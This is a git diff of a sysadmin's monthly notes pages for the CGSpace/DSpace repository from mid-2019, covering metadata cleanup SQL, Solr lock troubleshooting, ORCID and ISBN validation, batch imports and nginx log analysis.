          • Share some feedback about AReS v2 with the colleagues and encourage them to do the same
          • @@ -238,11 +238,11 @@ $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGR
            • Normalize text_lang values for metadata on DSpace Test and CGSpace:
            -
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
            +
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
             UPDATE 1551
            -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
            +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
             UPDATE 2070
            -dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
            +dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
             UPDATE 2
             
            • Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace
            • diff --git a/docs/2019-07/index.html b/docs/2019-07/index.html
              index f2473457d..2205cd47b 100644
              --- a/docs/2019-07/index.html
              +++ b/docs/2019-07/index.html
              @@ -38,7 +38,7 @@ CGSpace
               Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
               "/>
              -
              +
              @@ -153,13 +153,13 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
          -
          org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
          +
          org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
           
          • I restarted Tomcat ten times and it never worked…
          • I tried to stop Tomcat and delete the write locks:
          # systemctl stop tomcat7
          -# find /dspace/solr/statistics* -iname "*.lock" -print -delete
          +# find /dspace/solr/statistics* -iname "*.lock" -print -delete
           /dspace/solr/statistics/data/index/write.lock
           /dspace/solr/statistics-2010/data/index/write.lock
           /dspace/solr/statistics-2011/data/index/write.lock
          @@ -170,7 +170,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
           /dspace/solr/statistics-2016/data/index/write.lock
           /dspace/solr/statistics-2017/data/index/write.lock
           /dspace/solr/statistics-2018/data/index/write.lock
          -# find /dspace/solr/statistics* -iname "*.lock" -print -delete
          +# find /dspace/solr/statistics* -iname "*.lock" -print -delete
           # systemctl start tomcat7
           
          • But it still didn’t work!
          • @@ -221,8 +221,8 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
        -
        $ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
        -$ echo "10568/101992" >> item_*/collections
        +
        $ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
        +$ echo "10568/101992" >> item_*/collections
         $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
         
        • I noticed that all twenty-seven items had double dates like “2019-05||2019-05” so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection
        • @@ -249,20 +249,20 @@ $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair
      -
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-07-04-orcid-ids.txt
      +
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-07-04-orcid-ids.txt
       $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
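The extraction step above (grep for the ORCID pattern, then `sort -u`) can also be sketched in Python. This is only an illustration: the function name and the sample text are hypothetical, and the regular expression is copied from the grep invocation.

```python
import re

# Same pattern as the grep -oE expression above: four groups of four
# uppercase alphanumeric characters separated by hyphens.
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_orcids(text):
    """Return the sorted, de-duplicated ORCID identifiers found in text."""
    return sorted(set(ORCID_PATTERN.findall(text)))


# Hypothetical input standing in for the concatenated files.
sample = (
    "Marius R.M. Ekué: 0000-0002-5829-6321\n"
    "Chris Miyinzi Mwungu: 0000-0003-1658-287X\n"
    "Chris Miyinzi Mwungu: 0000-0003-1658-287X\n"
)
print("\n".join(extract_orcids(sample)))
```

Like the grep version, this matches anything shaped like an ORCID identifier and does not verify the checksum character.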
       
      • Send and merge a pull request for the new ORCID identifiers (#428)
      • I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the database:
      cg.creator.id,correct
      -"Marius Ekué: 0000-0002-5829-6321","Marius R.M. Ekué: 0000-0002-5829-6321"
      -"Mwungu: 0000-0001-6181-8445","Chris Miyinzi Mwungu: 0000-0001-6181-8445"
      -"Mwungu: 0000-0003-1658-287X","Chris Miyinzi Mwungu: 0000-0003-1658-287X"
      +"Marius Ekué: 0000-0002-5829-6321","Marius R.M. Ekué: 0000-0002-5829-6321"
      +"Mwungu: 0000-0001-6181-8445","Chris Miyinzi Mwungu: 0000-0001-6181-8445"
      +"Mwungu: 0000-0003-1658-287X","Chris Miyinzi Mwungu: 0000-0003-1658-287X"
       
      • But when I ran fix-metadata-values.py I didn’t see any changes:
      -
      $ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
      +
      $ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
       

      2019-07-06

      • Send a reminder to Marie about my notes on the CG Core v2 issue I created two weeks ago
      • @@ -282,22 +282,22 @@ $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names
      • Playing with the idea of using xsv to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:
      -
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
      +
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
       field,value,count
       cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
      -$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'         
      +$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'         
       field,value,count
       dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
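A rough Python equivalent of the duplicate check above, using only the standard library. The function name and sample rows are hypothetical. One difference worth noting: filtering with `grep -v ',1'` also hides any row that contains `,1` elsewhere (a count of 10, for example), whereas this sketch compares the count itself.

```python
import csv
import io
from collections import Counter


def find_duplicates(csv_file, column):
    """Return {value: count} for non-empty values seen more than once."""
    counts = Counter()
    for row in csv.DictReader(csv_file):
        value = (row.get(column) or "").strip()
        if value:
            counts[value] += 1
    return {value: n for value, n in counts.items() if n > 1}


# Hypothetical three-row export with one repeated DOI.
sample_csv = io.StringIO(
    "id,cg.identifier.doi\n"
    "1,https://doi.org/10.1016/j.agwat.2018.06.018\n"
    "2,https://doi.org/10.1016/j.agwat.2018.06.018\n"
    "3,\n"
)
print(find_duplicates(sample_csv, "cg.identifier.doi"))
```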
       
      • Or perhaps if DOIs are valid or not (having doi.org in the URL):
      -
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
      +
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
       field,value,count
       cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
       
      -
      $ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '"' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
      +
      $ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '"' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
       dc.identifier.issn
       978-3-319-71997-9
       978-3-319-71997-9
      @@ -350,13 +350,13 @@ dc.identifier.issn
       
    • Run all system updates on DSpace Test (linode19) and reboot it
    • Try to run dspace cleanup -v on CGSpace and ran into an error:
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(167394) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(167394) is still referenced from table "bundle".
     
    • The solution is, as always:
    # su - postgres
    -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
    +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
     UPDATE 1
     

    2019-07-16

      @@ -371,9 +371,9 @@ $ sudo rm -rf ~/.local/share/containers $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
    • Start working on implementing the CG Core v2 changes on my local DSpace test environment
    • @@ -414,7 +414,7 @@ Please see the DSpace documentation for assistance.
      • Create an account for Lionelle Samnick on CGSpace because the registration isn’t working for some reason:
      -
      $ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
      +
      $ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
       
      • I added her as a submitter to CTA ISF Pro-Agro series
      • Start looking at 1429 records for the Bioversity batch import @@ -484,18 +484,18 @@ Please see the DSpace documentation for assistance.

        I might be able to use isbnlib to validate ISBNs in Python:

      -
      if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
      -    print("Yes")
      +
      if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
      +    print("Yes")
       else:
      -    print("No")
      +    print("No")
       
      from stdnum import isbn
       from stdnum import issn
       
      -isbn.validate('978-92-9043-389-7')
      -issn.validate('1020-3362')
      +isbn.validate('978-92-9043-389-7')
      +issn.validate('1020-3362')
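For reference, the check-digit arithmetic behind these validators is small enough to sketch with the standard library alone. This is not how isbnlib or stdnum are implemented; the function names are hypothetical and the sketch only covers ISBN-13 and ISSN.

```python
def isbn13_is_valid(isbn):
    """Check an ISBN-13: digits weighted 1,3,1,3,... must sum to 0 mod 10."""
    digits = [int(c) for c in isbn if c.isdigit()]
    if len(digits) != 13:
        return False
    total = sum(d * (1 if i % 2 == 0 else 3) for i, d in enumerate(digits))
    return total % 10 == 0


def issn_is_valid(issn):
    """Check an ISSN: digits weighted 8..2 plus check digit must be 0 mod 11."""
    chars = issn.replace("-", "").upper()
    if len(chars) != 8 or not chars[:7].isdigit():
        return False
    if not (chars[7].isdigit() or chars[7] == "X"):
        return False
    total = sum(int(d) * w for d, w in zip(chars[:7], range(8, 1, -1)))
    check = 10 if chars[7] == "X" else int(chars[7])
    return (total + check) % 11 == 0


print(isbn13_is_valid("978-92-9043-389-7"))
print(issn_is_valid("1020-3362"))
```

A check like this would flag an ISBN that has been entered in an ISSN field, because the length test fails before any arithmetic is done.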
       

      2019-07-26

      • @@ -510,7 +510,7 @@ issn.validate('1020-3362')

        I figured out a GREL to trim spaces in multi-value cells without splitting them:

      -
      value.replace(/\s+\|\|/,"||").replace(/\|\|\s+/,"||")
      +
      value.replace(/\s+\|\|/,"||").replace(/\|\|\s+/,"||")
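The same cleanup can be sketched in Python for use outside OpenRefine. The function name is hypothetical, and the two GREL replacements are folded into a single pattern that removes whitespace on either side of the separator.

```python
import re


def trim_multivalue(value, separator="||"):
    """Remove whitespace around the separator without splitting the cell."""
    pattern = r"\s*" + re.escape(separator) + r"\s*"
    # A function replacement avoids any escape processing of the separator.
    return re.sub(pattern, lambda match: separator, value)


print(trim_multivalue("Kenya ||Uganda||  Ethiopia"))
```

Whitespace at the very start or end of the cell is left alone, as it is with the GREL expression.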
       
      • I whipped up a quick script using Python Pandas to do whitespace cleanup
      diff --git a/docs/2019-08/index.html b/docs/2019-08/index.html index c0bb17091..b192c3262 100644 --- a/docs/2019-08/index.html +++ b/docs/2019-08/index.html @@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded… wow, that’s luck Run system updates on DSpace Test (linode19) and reboot it "/> - + @@ -235,7 +235,7 @@ Run system updates on DSpace Test (linode19) and reboot it
    -
    # /opt/certbot-auto renew --standalone --pre-hook "/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld" --post-hook "/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx"
    +
    # /opt/certbot-auto renew --standalone --pre-hook "/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld" --post-hook "/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx"
     
    • It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains
    • Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04’s OpenSSL 1.1.0g with nginx 1.16.0
    • @@ -243,9 +243,9 @@ Run system updates on DSpace Test (linode19) and reboot it
    • Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:
    $ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
    -$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload.csv
    +$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload.csv
     $ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
    -$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs2.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload2.csv
    +$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs2.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload2.csv
     $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
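The grep and sed pipeline above could also be written as a short Python sketch. The log layout is an assumption inferred from the sed expressions (a `> Downloading <url>...` line followed by a line containing `Download failed`); the function names are hypothetical, and the ANSI pattern is the one from the `sed -r` call.

```python
import re

# Same escape-sequence pattern as the sed -r expression above.
ANSI_PATTERN = re.compile(r"\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]")


def strip_ansi(line):
    """Remove terminal color and cursor escape sequences from a line."""
    return ANSI_PATTERN.sub("", line)


def failed_urls(lines):
    """Return URLs whose 'Downloading' line is followed by a failure line."""
    urls = []
    previous = ""
    for raw in lines:
        line = strip_ansi(raw.rstrip("\n"))
        if "Download failed" in line and "Downloading" in previous:
            url = previous.replace("> Downloading ", "", 1).replace("...", "", 1)
            urls.append(url)
        previous = line
    return urls


# Hypothetical log excerpt in the assumed format.
log = [
    "\x1b[32m> Downloading https://example.org/a.pdf...\x1b[0m",
    "\x1b[31m> Download failed\x1b[0m",
    "> Downloading https://example.org/b.pdf...",
    "> Saved",
]
print(failed_urls(log))
```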
     
    • @@ -329,7 +329,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
      • Create a test user on DSpace Test for Mohammad Salem to attempt depositing:
      -
      $ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
      +
      $ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
       
      • Create and merge a pull request (#429) to add eleven new CCAFS Phase II Project Tags to CGSpace
      • Atmire responded to the Solr cores issue last week, but they could not reproduce the issue @@ -345,7 +345,7 @@ java.lang.OutOfMemoryError: GC overhead limit exceeded
      • I increased the heap size to 1536m and tried again:
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1536m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1536m"
       $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
       
      • This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM
      • @@ -361,7 +361,7 @@ $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
     $ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
     $ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
     
      @@ -429,7 +429,7 @@ return os.path.basename(value)
    -
    $ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
    +
    $ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
     
    • Apply the corrections on CGSpace and DSpace Test
        @@ -478,7 +478,7 @@ sys 2m24.715s
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
     COPY 65597
     
    • Then I created a new CSV with two author columns (edit title of second column after):
    • @@ -492,7 +492,7 @@ COPY 65597
    • This fixed a bunch of issues with spaces, commas, unnecessary Unicode characters, etc
    • Then I ran the corrections on my test server and there were 185 of them!
    -
    $ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
    +
    $ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
     
    • I very well might run these on CGSpace soon…
    @@ -506,7 +506,7 @@ COPY 65597 -
    $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec ./cgcore-xsl-replacements.sed {} \;
    +
    $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec ./cgcore-xsl-replacements.sed {} \;
     
    • I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
        @@ -526,7 +526,7 @@ COPY 65597
    -
    "handles":["10986/30568","10568/97825"],"handle":"10986/30568"
    +
    "handles":["10986/30568","10568/97825"],"handle":"10986/30568"
     
    • So this is the same issue we had before, where Altmetric knows this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn’t show it because it seems to be a secondary handle or something
    diff --git a/docs/2019-09/index.html b/docs/2019-09/index.html index 4a8340d20..f40993605 100644 --- a/docs/2019-09/index.html +++ b/docs/2019-09/index.html @@ -12,7 +12,7 @@ Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: -# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -23,7 +23,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -49,7 +49,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: -# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -60,7 
+60,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: 7249 2a01:7e00::f03c:91ff:fe18:7396 9124 45.5.186.2 "/> - + @@ -163,7 +163,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         440 17.58.101.255
         441 157.55.39.101
         485 207.46.13.43
    @@ -174,7 +174,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
         814 207.46.13.212
        2472 163.172.71.23
        6092 3.94.211.189
    -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          33 2a01:7e00::f03c:91ff:fe16:fcb
          57 3.83.192.124
          57 3.87.77.25
    @@ -193,14 +193,14 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
     
    • It actually got mostly HTTP 200 responses:
    -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
        1775 200
         703 499
          72 503
     
    • And it was mostly requesting Discover pages:
    -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c 
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c 
        2350 discover
          71 handle
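The `awk | sort | uniq -c` counting used in these log checks can be sketched in Python with a `Counter`. This assumes whitespace-separated lines in nginx's combined log format, where field 1 is the client IP and field 9 is the HTTP status, as the awk calls above imply. The function name and sample lines are hypothetical.

```python
from collections import Counter


def count_field(lines, index, needle=""):
    """Count the values of one whitespace-separated field (0-based index),
    optionally keeping only lines that contain needle."""
    counts = Counter()
    for line in lines:
        if needle and needle not in line:
            continue
        fields = line.split()
        if len(fields) > index:
            counts[fields[index]] += 1
    return counts


# Hypothetical log lines in combined format.
log_lines = [
    '163.172.71.23 - - [01/Sep/2019:00:01:02 +0200] "GET /discover HTTP/1.1" 200 1234 "-" "bot"',
    '163.172.71.23 - - [01/Sep/2019:00:01:03 +0200] "GET /discover HTTP/1.1" 499 0 "-" "bot"',
    '3.94.211.189 - - [01/Sep/2019:00:01:04 +0200] "GET /handle/10568/1 HTTP/1.1" 200 99 "-" "bot"',
]

# Top client IPs, like awk '{print $1}' | sort | uniq -c | sort -n
print(count_field(log_lines, 0).most_common(10))
# Status codes for one IP, like grep <ip> | awk '{print $9}' | sort | uniq -c
print(count_field(log_lines, 8, needle="163.172.71.23"))
```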
     
      @@ -284,11 +284,11 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
    • Around the same time I see the following in the DSpace log:
    2019-09-15 15:32:18,079 INFO  org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644 
    -2019-09-15 15:32:18,135 WARN  org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name="METSRIGHTS"
    +2019-09-15 15:32:18,135 WARN  org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name="METSRIGHTS"
     
    • I see a lot of these errors today, but not earlier this month:
    -
    # grep -c 'Cannot find named plugin' dspace.log.2019-09-*
    +
    # grep -c 'Cannot find named plugin' dspace.log.2019-09-*
     dspace.log.2019-09-01:0
     dspace.log.2019-09-02:0
     dspace.log.2019-09-03:0
    @@ -307,9 +307,9 @@ dspace.log.2019-09-15:808
     
    • Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:
    -
    2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.METSRightsCrosswalk", name="METSRIGHTS"
    -2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.OREDisseminationCrosswalk", name="ore"
    -2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.DIMDisseminationCrosswalk", name="dim"
    +
    2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.METSRightsCrosswalk", name="METSRIGHTS"
    +2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.OREDisseminationCrosswalk", name="ore"
